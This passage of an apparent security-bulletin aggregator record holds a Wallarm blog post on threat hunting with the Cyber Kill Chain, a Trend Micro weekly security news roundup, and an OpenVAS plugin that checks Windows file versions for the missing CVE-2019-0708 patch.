one thing about tomorrow is certain: the cybersecurity threat landscape is under siege by a new, more sophisticated and challenging type of attacker than ever before. They are different than previous generations of hackers. New attacks will be stealthier and grow more covert every year. New threat vectors are coming, adding to a growing tally of variants from existing threats. Newer forms of phishing attacks, ransomware, social engineering, and even cryptojacking will proliferate \u2014 to name only a few. The key difference in the way attacks are launched than in previous years is in the modus operandi of the new hacker. Sophomoric attacks, like \u201cSmash and Grab\u201d campaigns, are gone. The new cyberattacker is patient and deliberate.\n\n![](https://cdn-images-1.medium.com/max/1024/1*kvs-IXmo_q_241ucyeagjQ.jpeg)Be vigilant about security so backdoors and deeper layers aren\u2019t exploited by hackers.\n\nThe new cyberattacker takes their time to select a target (or victim) and study it completely for any unknown weaknesses and vulnerabilities. They determine the best possible backdoor in which they can enter into their target and stay in for longer periods of time than ever before. If the earlier cyberattacker could be likened to cat burglars, then the new cyberattacker could be likened to a cartel.\n\nA cyberattacker may not stay in the confines of their target for months on end. They may leave and penetrate it again later via the backdoor that they left ajar. The point is that they now have the ability to go undetected for long periods of time. Rather than trying to take what they want all at once, they bleed their victim bit by bit.\n\nThe long game of residing in a hack, means businesses and corporations need to maintain the highest levels of alertness to track down the most covert cyberattackers before even the beginning stages of an attack can occur. A constant regimen of [Threat Hunting activities](<https://digitalguardian.com/blog/what-does-cyber-threat-hunter-do>) by your IT security staff is a winning strategy.\n\n### Understand What Is Vulnerable\n\n#### Threat and Vulnerability Management\n\nNot all assets are vulnerable to all threats. First, you need to make sure your most critical assets are protected. Implement a classification schema in order to determine what is most at risk in your existing IT Infrastructure. All assets need to examined. But, in this case, you are using a top-down approach by classifying items that are at extremely high risk down to those assets that are least at risk.\n\n#### Identity Management\n\nDetermine the identification mechanisms implemented (or planned for implementation) for employees or other parties trying to gain access to shared network resources.\n\nExamples of identity management mechanisms are password managers, two-factor authentication (2FA), and biometrics (like fingerprint or voice recognition).\n\n#### Security Awareness Training and Education\n\n![](https://cdn-images-1.medium.com/max/1024/1*8_biV1SMROdqgVzroi7bqQ.jpeg)Work-life imbalance, wfh, remote workers, and vacations can leave devices vulnerable to hackers w/o the right security protocols and tools.\n\nEvaluate the comprehensiveness of employee awareness and training in security best practices and policies. Everyone in the company plays a role in protecting IT resources \u2014 from on-premise use to mobile devices and laptops. Firmly relay the need for compliance and clearly explain the policies surrounding noncompliance or improper use of company resources.\n\nAuditing your security awareness and training should include looking at internal traffic. Check that high-traffic areas are being properly secured and used with appropriate rights and permissions.\n\nThe line between work-life and personal time blur in the age of smartphones and remote work. Ensure that user practices, technology, and companywide policies are aligned is not solely in the hands of an isolated security team.\n\n#### Security Policy\n\nPeriodic scrutiny of existing security policies that support security awareness and compliance is critical. Check whether security is being enforced. Address any weaknesses. Regular updates should be released, reflecting the current threat environment and organizational needs.\n\n#### Incident Response Plan\n\nYour company should have an [Incident Response Plan](<https://www.incidentresponse.com/a-guide-to-creating-an-incident-response-plan/>), which needs to be regularly updated and reviewed as part of threat hunting and remediation.\n\nCheck:\n\n * Update frequency of the Incident Response Plan\n * Adoption and practice in real time\n * Employee contact information roster is correct\n * Effectiveness of the communications subcomponent\n\n### Review Existing Protections\n\nThe meat of threat hunting is in auditing the existing IT infrastructure and security architecture. This is, objectively, the most complex part of the assessment and should be the most comprehensive.\n\nA full audit of your existing monitoring tools identifies vulnerabilities and weaknesses. Assessing your security architecture will be sure that issues can be identified, the overall infrastructure has no holes, and that the most efficient solutions and tools for handling the threat landscape is in place.\n\n#### Security Management\n\nPart of establishing good protection is ensuring that your security team has an adequate ratio of staffing and resources, including up-to-date monitoring tools and support.\n\nIncorporate security performance evaluations into your threat hunting process. Clearly defined responsibility and reviewing what the pain points and places for improvement are for the response teams can help address shortfalls and vulnerabilities that occur when teams are overextended or underperforming.\n\n#### Emerging Security Technologies\n\nPrioritize advances in tools and technology with every threat remediation activity. Newer security tools include incident response features that identify existing and impending threats. They arise from responsive industry specialization that looks into the consequences and weaknesses that come with technological growth. Attackers exploit weaknesses. Attack prevention is more complete with technologies as up-to-date with the current threat environment.\n\n![](https://cdn-images-1.medium.com/max/1024/1*sO7jBrNOVBwbvvfbdkvetg.jpeg)Know your threat landscape and equip yourself with the right, up-to-date security tools.\n\nFor example, the growth of APIs to keep business responsive to markets demanding rapid CI/CD means stronger protection at the API level (Layer-7 protection) is of new and paramount importance. Technology becomes more specialized as a technological landscape gets bigger.\n\nConducting a financial audit that aligns with your security audit can ensure critical financial resources are applied in the most cost-effective manner.\n\nEvaluating the security budget and technology doesn\u2019t mean \u201cspend more\u201d. It means evaluating whether money is being spent effectively in relation to the level of security you have. A budget review should evaluate:\n\n * Are the tools I have the most up-to-date?\n * Are there new options that expose and prioritize new vulnerabilities or solutions?\n * Is our internal CI/CD impacting our security?\n\nIt is crucial to question, the impact of CI/CD cycles. Rollouts that come at the cost of security can lead to high-cost recovery after an attack or breach.\n\nDispelling the myth that more security toys is better is also critical. The marketplace or a legacy of security solutions is not the same as having a fully defended infrastructure. In fact, more solutions piled onto one another can increase the attack surface for a cyberattacker.\n\n#### Third-Party Entities, Technology, and Services\n\nOutsourced entities conducting your daily business, accessing your systems, carry risks. Audit hiring practices of third parties that have any potential security risk. Increasing the due diligence around hiring criteria, processes, and background checks can reduce company vulnerability to an inside job. It\u2019s also important that hired third parties, like contractors, are part of security training and awareness.\n\nOnce this Risk Assessment has been completed, the next step in any Threat Hunting Remediation exercise is determining what to exactly hunt for and the frequency of that hunt.\n\n### Select a Threat Model to Use\n\nAfter performing a risk assessment, you should have a documented list of the kinds of threats and risks to hunt for. You are now ready to apply the list to one of four threat hunting models.\n\n#### Four threat hunting models:\n\n * [Cyber Kill Chain](<https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html>) (Lockheed Martin)\n * [Attack Lifecycle](<https://www.fireeye.com/solutions.html>) (Fireye)\n * [Cyber Attack Model](<https://blogs.gartner.com/ramon-krikken/2014/08/08/introducing-gartners-cyber-attack-chain-model/>) (Gartner)\n * [ATT&CK Lifecycle](<https://attack.mitre.org/>) (MITRE)\n![](https://cdn-images-1.medium.com/max/975/0*gXobeWSKVmzB11eY)<https://sqrrl.com/media/ebook-web.pdf>\n\n### The Cyber Kill Chain Model\n\nCyber Kill Chain is the more popular one to use in threat hunting remediation exercises, so we will take you through this example of threat hunting below. A Cyber Kill Chain threat hunting approach revolves around the sequential way cyberattacks happen. A cyberattacker usually launches a particular threat in a series of phases. Each phase is a point where the cyber attack vector could be mitigated if the right security controls are in place.\n\n### 7 phases of cyberattack in the Kill Chain Model:\n\n#### Reconnaissance\n\nCyberattackers spend time researching their potential target. They determine the target\u2019s weaknesses and vulnerabilities and the most opportune ways in \u2014 the most covert backdoor possible.\n\n#### Weaponization\n\nAfter identifying the best backdoor possible, the cyberattacker creates a malware weapon to deploy at the target. With newer attacks, these can be harder to identify because they are designed to match target-specific vulnerabilities and weaknesses.\n\n#### Delivery\n\nThe tailored malware weapon is launched.\n\n#### Exploitation\n\nThe malicious file in the malware weapon is now triggered. Exploiting the vulnerabilities and weaknesses of the target, whatever the attack\u2019s aim, is in position \u2014 be that stealing data, harming software, et cetera.\n\n#### Installation\n\nThe malware weapon creates an access point, or backdoor, into the target. Through this access point, the attack is able to further penetrate into the infrastructure.\n\n#### Command and Control\n\nAt this stage, the cyberattacker has their hands on the target and can manipulate it to their own ends.\n\n#### Actions on Objective\n\nOnce in location and installed, the cyberattacker can start taking action. This is the end of the hack, resulting in the theft of passwords, ransomware, data exfiltration, data leakage, or even the destruction of data.\n\n### Fixing, Patching and Compensating Controls\n\nNow that you\u2019ve run a risk assessment and chosen a threat hunting model you can understand what stages in the model represent the most risks and start putting counter-measures in place.\n\n![](https://cdn-images-1.medium.com/max/1024/0*eUYX_4HOUp43Ru_A)Start with the highest risks that come from your risk assessment.\n\n#### 1: Create and test a threat hunting hypothesis\n\nCreate a general hypothesis of what you expect to unveil in a threat hunting exercise. These should be easy to determine based on the findings of the risk assessment and application of those findings to the model.\n\nUsing our vulnerable network server example, one hypothesis could be: if a fileless based attack is launched, it would totally wipe out the memory banks of the network servers and destroy their processing capabilities.\n\n#### 2: Collect relevant information and data\n\nTest hypotheses with all available threat hunting tools. Collect the resulting data for review.\n\nExamine data for any anomalies and malicious patterns in the datasets that have been previously identified.\n\nOne method of threat hunting is to use these identified anomalies and malicious attacks to reconstruct the tactics, techniques, and procedures (TTPs) employed in cyberattacks. If no anomalies are detected, you can potentially determine no systems have been compromised.\n\n#### 3\\. Lather, Rinse, Repeat\n\nAfter completing all manually helmed threat hunts with the tools at hand, look to automation. First, determine which steps can be expedited with automated threat hunting tools.\n\n[Automated threat hunting](<https://www.csoonline.com/article/3254230/how-to-automate-threat-hunting.html>) tools intelligently use human and technological resources. Security teams are wasted on performing the same necessary tests over and over manually if there is a better, automated option. If the same threat hunting exercise needs to be repeated again a later time, automate as much as possible. Manual processes should only be used for new hunting exercises.\n\n![](https://cdn-images-1.medium.com/max/1024/0*n1zqkgcnXB14BEoX)Happy Threat Hunting!\n\n#### 4\\. Creating Security Solutions\n\nOnce you\u2019ve hunted down threats, you have to determine how to resolve them.\n\nIf a cyberattack is detected, determine where it is in its lifecycle. That will determine your next course of action. For example, if malicious patterns and anomalies show a cyberattack is in its beginning stages, your incident response team can handle the threat before it does damage.\n\nIf no threat is detected, you can start the threat hunting planning cycle again for a new exercise.\n\n### How Effective was a Threat Hunting Exercise?\n\nEach threat hunting remediation exercise should be followed by a post-game evaluation to, and determine if it was successful or not. Establish realistic data-driven metrics that can measure real indicators of success around threats, like the turnaround time for responding to incidents.\n\nExamples of security performance metrics to track are:\n\n * Number of incidents by severity\n * Number of compromised hosts\n * Dwell time\n * The number of identified vulnerabilities\n * Corrected and identified insecure practices\n * False-positive rate of transitioned hunts\n\n#### Incidents by Severity\n\nMonitoring the volume of incidents by severity establishes a running tally of the total number of previously known and unknown incidents.\n\nOver time, this provides context as to how well security defenses are working.\n\n#### Compromised Hosts\n\nA running tally of the total number of compromised hosts in the IT Infrastructure is an especially useful metric when threat hunting on endpoint security tools. It is highly effective for revealing setting misconfigurations.\n\n#### Dwell Time\n\nDwell time shows how long discovered security threats were active in your IT Infrastructure. Dwell time has three areas that add detail and insight::\n\n * Time between infection and detection\n * Time from detection until to investigation\n * Time between investigation and remediation\n\nThese various times allow you to evaluate where remediation resources should be put or fixes should be made to technology, processes, or teams.\n\n#### Vulnerabilities Identified\n\nThis is the total number of vulnerabilities discovered based on the hunting exercises being conducted.\n\n![](https://cdn-images-1.medium.com/max/1024/0*YkkPQTQdv9EWU0W2)Take a close look following your threat hunting practices and keep repeating good security hygiene and checkups.\n\n#### Corrected and Identified Insecure Practices\n\nThe total number of identified and corrected IT-related insecure practices allows for internal measures to quickly up security health. Unaddressed, insecure practices can accidentally leave a backdoor open for future attacks.\n\nFalse Positive Rate of Transitioned HuntsAutomation is critical to reducing the rate of false positives. Not only is it a waste of your security team\u2019s time to manually tune, but it\u2019s impossible to sort through high, repetitive numbers of false positives. Unassuaged volumes of false positives create too much noise around identifying real threats and vulnerabilities. There is no foreseeable time when data is going to slow down or lighten, so adding automation is key to keeping pace with security needs.\n\n### Putting it all together\n\nThere are several steps in applying risk assessment results to the model to prepare for staring threat hunting activities.\n\n 1. Apply your prioritized list of risks and vulnerabilities, made in the risk assessment, to your selected threat hunting model.\n 2. Determine the kinds of activities that a cyberattacker could target as threat vectors for the identified risks, specific to your company.\n 3. Map the risks and cyberattacker opportunity activities to the phases of the threat hunting model. \nEx:) If the Network Servers in your IT Infrastructure is most at risk, determine the kinds of actions or activities a cyberattacker would take to attack them. Then, place them at the different phases of the threat hunting model accordingly.\n 4. Calendar routine threat hunting remediation activities. Based on risk level, rotate through regular threat hunts for each at-risk IT asset.\n\nThe exact frequency will be limited by the available resources. However, it\u2019s critical to do different threat detection tests as often as possible.\n\n![](https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=2fd41b3abd2e)\n\n* * *\n\n[Using Threat Modeling in Cybersecurity to Hunt and Remediate](<https://lab.wallarm.com/using-threat-modeling-in-cybersecurity-to-hunt-and-remediate-2fd41b3abd2e>) was originally published in [Wallarm](<https://lab.wallarm.com>) on Medium, where people are continuing the conversation by highlighting and responding to this story.", "modified": "2019-05-18T00:41:48", "published": "2019-05-18T00:41:48", "id": "WALLARMLAB:6D2FEBCC1041A44E85DD8B1BE56A9825", "href": "https://lab.wallarm.com/using-threat-modeling-in-cybersecurity-to-hunt-and-remediate-2fd41b3abd2e?source=rss----49b51199b3da---4", "type": "wallarmlab", "title": "Using Threat Modeling in Cybersecurity to Hunt and Remediate", "cvss": {"score": 0.0, "vector": "NONE"}}], "trendmicroblog": [{"lastseen": "2019-05-17T16:27:54", "bulletinFamily": "blog", "description": "![](https://blog.trendmicro.com/wp-content/uploads/2018/02/Week-in-Security-News-Logo_RGB-300x300.jpg)\n\n \n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about vulnerabilities that can allow hackers to retrieve data from CPUs and mine cryptocurrency.\n\nRead on:\n\n[**May\u2019s Patch Tuesday Include Fixes for \u2018Wormable\u2019 Flaw in Windows XP, Zero-Day Vulnerability**](<https://blog.trendmicro.com/trendlabs-security-intelligence/mays-patch-tuesday-include-fixes-for-wormable-flaw-in-windows-xp-zero-day-vulnerability/>)\n\n_Microsoft\u2019s May security release includes updates for 80 vulnerabilities for a number of Microsoft products, including a security update for unsupported operating systems such as Windows XP and Server 2003._\n\n[**Trend Micro Unveils Cloud-Native Security Customized to the Demand of DevOps**](<https://www.helpnetsecurity.com/2019/05/16/trend-micro-single-solution-security/>)\n\n_Trend Micro launched container security capabilities added to Trend Micro Deep Security to elevate protection across the entire DevOps lifecycle and runtime stack._\n\n[**Side-Channel Attacks RIDL, Fallout, and ZombieLoad Affect Millions of Vulnerable Intel Processors**](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/side-channel-attacks-ridl-fallout-and-zombieload-affects-millions-of-vulnerable-intel-processors>)\n\n_Researchers found a bevy of critical vulnerabilities in modern Intel processors that, when exploited successfully, can leak or let hackers retrieve data being processed by the vulnerable CPUs. _\n\n[**Trump Issues Executive Order Paving Way for Ban on Huawei**](<https://www.axios.com/trump-huawei-ban-executive-order-eb86bc1f-8365-465d-92d8-b0dfc9ad8dc4.html>)\n\n_President Trump has issued an executive order declaring a national emergency and prohibiting U.S. companies from using telecom services that are solely owned, controlled, or directed by a foreign adversary, clearing the way for a ban on the Chinese-owned Huawei._\n\n[**Unsecured Server Leaks PII of Almost 90% of Panama Residents**](<https://www.trendmicro.com/vinfo/us/security/news/online-privacy/unsecured-server-leaks-pii-of-almost-90-of-panama-residents>)\n\n_The personally identifiable information of almost 90% of Panama\u2019s population has been divulged due to an unsecured Elasticsearch server that was found without authentication or firewall protection, connected to the internet, and publicly viewable on any browser. _\n\n**[Google Discloses Security Bug in its Bluetooth Titan Security Keys, Offers Free Replacement](<https://techcrunch.com/2019/05/15/google-recalls-its-bluetooth-titan-security-keys-because-of-a-security-bug/>)**\n\n_Google says that the security bug, which could allow an attacker in close physical proximity to circumvent the security the key is supposed to provide, is due to a \u201cmisconfiguration in the Titan Security Keys\u2019 Bluetooth pairing protocols.\u201d_\n\n**[Jenkins Vulnerability Exploited to Drop Kerberods Malware and Launch Monero Miner](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/jenkins-vulnerability-exploited-to-drop-kerberods-malware-and-launch-monero-miner>)**\n\n_Threat actors were found exploiting CVE-2018-1000861, a vulnerability in the Stapler web framework that is used by the Apache Jenkins open-source software development automation server with versions 2.153 and earlier._\n\n**[Crypto Exchange Binance Restarting Services After Post-Hack Upgrade](<https://www.coindesk.com/crypto-exchange-binance-restarting-services-after-post-hack-upgrade>)**\n\n_Cryptocurrency exchange Binance has announced that it is back online after completing a security upgrade prompted by a recent hack that saw 7,000 BTC worth $41 million stolen._\n\nDo you worry about your personally identifiable information being divulged to cyber criminals? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: [@JonLClay.](<https://twitter.com/jonlclay>)\n\n_ _\n\n_ _\n\nThe post [This Week in Security News: Unsecured Servers and Vulnerable Processors](<https://blog.trendmicro.com/this-week-in-security-news-unsecured-servers-and-vulnerable-processors/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2019-05-17T14:14:56", "published": "2019-05-17T14:14:56", "id": "TRENDMICROBLOG:3E70A01CB57177EC40F969FCA453BDE6", "href": "https://blog.trendmicro.com/this-week-in-security-news-unsecured-servers-and-vulnerable-processors/", "type": "trendmicroblog", "title": "This Week in Security News: Unsecured Servers and Vulnerable Processors", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-20T14:32:10", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4500331.", "modified": "2019-05-18T00:00:00", "published": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310814894", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814894", "title": "Microsoft Windows Remote Desktop Service Remote Code Execution Vulnerability (KB4500331)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814894\");\n script_version(\"2019-05-18T06:07:35+0000\");\n script_cve_id(\"CVE-2019-0708\");\n script_bugtraq_id(108273);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-18 06:07:35 +0000 (Sat, 18 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-17 15:27:29 +0530 (Fri, 17 May 2019)\");\n script_name(\"Microsoft Windows Remote Desktop Service Remote Code Execution Vulnerability (KB4500331)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4500331.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists when an unauthenticated attacker\n connects to the system using RDP and sends specially crafted requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker to\n execute arbitrary code on the target system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows XP SP3\n Microsoft Windows Server 2003 SP2\n Microsoft Windows XP Professional x64 Edition SP2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the\n references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-in/help/4500331/windows-update-kb4500331\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"\\drivers\\Termdd.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(hotfix_check_sp(xp:4) > 0)\n{\n if(version_is_less(version:fileVer , test_version:\"5.1.2600.7701\"))\n {\n report = report_fixed_ver(file_checked:path + \"\\Termdd.sys\",\n file_version:fileVer, vulnerable_range:\"Less than 5.1.2600.7701\");\n security_message(data:report);\n exit(0);\n }\n}\n\nelse if(hotfix_check_sp(win2003:3, win2003x64:3, xpx64:3) > 0){\n\n if(version_is_less(version:fileVer , test_version:\"5.2.3790.6787\"))\n {\n report = report_fixed_ver(file_checked:path + \"\\Termdd.sys\",\n file_version:fileVer, vulnerable_range:\"Less than 5.2.3790.6787\");\n security_message(data:report);\n exit(0);\n }\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}